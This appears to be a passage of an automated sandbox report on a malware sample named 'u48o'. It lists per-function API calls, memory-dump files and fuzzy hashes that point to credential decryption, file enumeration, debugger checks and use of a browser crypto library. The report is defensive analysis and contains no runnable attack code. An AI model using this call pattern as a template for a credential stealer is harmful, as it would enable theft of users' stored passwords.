                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040DB1C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                              • String ID: [@$\*.*
                                                                                                                                                                                                                                              • API String ID: 2325840235-1445036518
                                                                                                                                                                                                                                              • Opcode ID: 38e3d6cce44b768a46b52d0f201da3e53e41ef1bf9bb4bc0dfdcbbefdde4abe9
                                                                                                                                                                                                                                              • Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38e3d6cce44b768a46b52d0f201da3e53e41ef1bf9bb4bc0dfdcbbefdde4abe9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C311C6F,00000000,00000004,?,?), ref: 6C366C3F
                                                                                                                                                                                                                                                • Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C311C6F,00000000,00000004,?,?), ref: 6C366C60
                                                                                                                                                                                                                                              • PR_ExplodeTime.NSS3(00000000,6C311C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C311C6F,00000000,00000004,?,?), ref: 6C366C94
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                              • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                              • Opcode ID: 4ddfce87d2e82e66b97566d41d5af75aaa41a45a17c97fee88bced650fe4f173
                                                                                                                                                                                                                                              • Instruction ID: 1af1337d2e48380ce43d2dd187f18e19722f321ea3b24d4d474f773a73ec61aa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ddfce87d2e82e66b97566d41d5af75aaa41a45a17c97fee88bced650fe4f173
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8514B72B015494FC71CCDADDC626DAB7EAABA4310F48C23AE442DBB85D638D906CB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6C4714E4,6C3DCC70), ref: 6C428D47
                                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C428D98
                                                                                                                                                                                                                                                • Part of subcall function 6C300F00: PR_GetPageSize.NSS3(6C300936,FFFFE8AE,?,6C2916B7,00000000,?,6C300936,00000000,?,6C29204A), ref: 6C300F1B
                                                                                                                                                                                                                                                • Part of subcall function 6C300F00: PR_NewLogModule.NSS3(clock,6C300936,FFFFE8AE,?,6C2916B7,00000000,?,6C300936,00000000,?,6C29204A), ref: 6C300F25
                                                                                                                                                                                                                                              • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C428E7B
                                                                                                                                                                                                                                              • htons.WSOCK32(?), ref: 6C428EDB
                                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C428F99
                                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C42910A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                              • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                              • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                              • Opcode ID: 04060341ca8bea48bf6358edfd1980649aaf60253960e12231e40ab3f63b57dc
                                                                                                                                                                                                                                              • Instruction ID: 3be79d85efe42b7f9a3fec262eab72a2aedee1331654bcb106c55ccc1f8b47db
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04060341ca8bea48bf6358edfd1980649aaf60253960e12231e40ab3f63b57dc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2302AD329052618FEB15CF1AC466F7ABBB2EF52304F19825ACC915BBD1C33AD909C790
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C3EC3A2,?,?,00000000,00000000), ref: 6C3CA528
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3CA6E0
                                                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3CA71B
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3CA738
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3CA6CA
                                                                                                                                                                                                                                              • database corruption, xrefs: 6C3CA6D4
                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C3CA6D9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                              • API String ID: 622669576-598938438
                                                                                                                                                                                                                                              • Opcode ID: be56b98f070e0a62287ceed0f173fd7c1ce0b65f175591e55c9e8755a77924d0
                                                                                                                                                                                                                                              • Instruction ID: d31640700a5fe5df72b40c81694db4ea3d27c0e4a8a83f96b5ba6f040cd075d1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be56b98f070e0a62287ceed0f173fd7c1ce0b65f175591e55c9e8755a77924d0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87919B71B083418BC714CF29C480A5EB7E1BF48318F558A6DE8D58BB91EB75EC85CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C324444
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C324466
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C371228
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C371238
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C37124B
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: PR_CallOnce.NSS3(6C472AA4,6C3712D0,00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C37125D
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C37126F
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C371280
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C37128E
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C37129A
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C3712A1
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C32447A
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C32448A
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C324494
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 241050562-0
                                                                                                                                                                                                                                              • Opcode ID: 41c1357ddd27ed0ab8f2fde78694d24ae8af31fbf9288320a00df81e96892e5f
                                                                                                                                                                                                                                              • Instruction ID: ea170d453e65db57ca01989ee4fd653212792e6f60c61fd30f5de09c9d399a84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41c1357ddd27ed0ab8f2fde78694d24ae8af31fbf9288320a00df81e96892e5f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C511B7B2D107049BDB20CF65DD815A7B7F8FF592187044B3EE88D52A00F375B5988B91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00418E46
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00418E89
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                              • Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                              • Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
                                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3657800372-0
                                                                                                                                                                                                                                              • Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                              • Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C42D086
                                                                                                                                                                                                                                              • PR_Malloc.NSS3(00000001), ref: 6C42D0B9
                                                                                                                                                                                                                                              • PR_Free.NSS3(?), ref: 6C42D138
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                              • String ID: >
                                                                                                                                                                                                                                              • API String ID: 1782319670-325317158
                                                                                                                                                                                                                                              • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                              • Instruction ID: 74b28a713d90bd5a968f3f01ac4d7ada2be1c7bf06ac4027dea4eba7c70db0de
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91D12962B455560BFB24C87C8CA3FEAB7938B42378F684325D5619BBE5EA1DC843C341
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e644a5cf5a4fee3587e91c2f469431de969cd47f823acd8b5c1756704e264ce9
                                                                                                                                                                                                                                              • Instruction ID: 410e806937f26da9d2e7295f2fc2bf679e51f593ed47ee4f9c632492a3e89a7d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e644a5cf5a4fee3587e91c2f469431de969cd47f823acd8b5c1756704e264ce9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F10071F012668BEB05EF29C8907BD77F1AB8A308F154229C945EBB48E7309951CFD2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                                                              • Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                              • Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • bind.WSOCK32(?,?,?,?,6C306401,?,?,0000001C), ref: 6C306422
                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(?,?,?,?,6C306401,?,?,0000001C), ref: 6C306432
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
